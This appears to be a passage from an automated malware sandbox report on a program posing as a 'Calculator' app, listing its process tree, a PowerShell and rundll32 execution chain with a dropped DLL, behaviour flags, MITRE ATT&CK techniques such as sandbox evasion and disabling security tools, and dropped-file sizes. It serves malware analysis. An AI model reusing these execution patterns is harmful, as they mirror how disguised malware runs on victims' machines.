C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=428 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3404 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=2348 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3404 /prefetch:85⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_4623.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6452 -ip 64521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5956 -ip 59561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 2208 -ip 22081⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
3Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
684KB
-
Filesize
892KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
272KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
292KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
288KB
-
Filesize
164KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
496KB
-
Filesize
856KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
36KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
856KB
-
Filesize
70.1MB
-
Filesize
69.2MB
-
Filesize
192KB
-
Filesize
6.1MB
-
Filesize
80.5MB
-
Filesize
80.2MB
-
Filesize
6.1MB
-
Filesize
272KB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
272KB
-
Filesize
8KB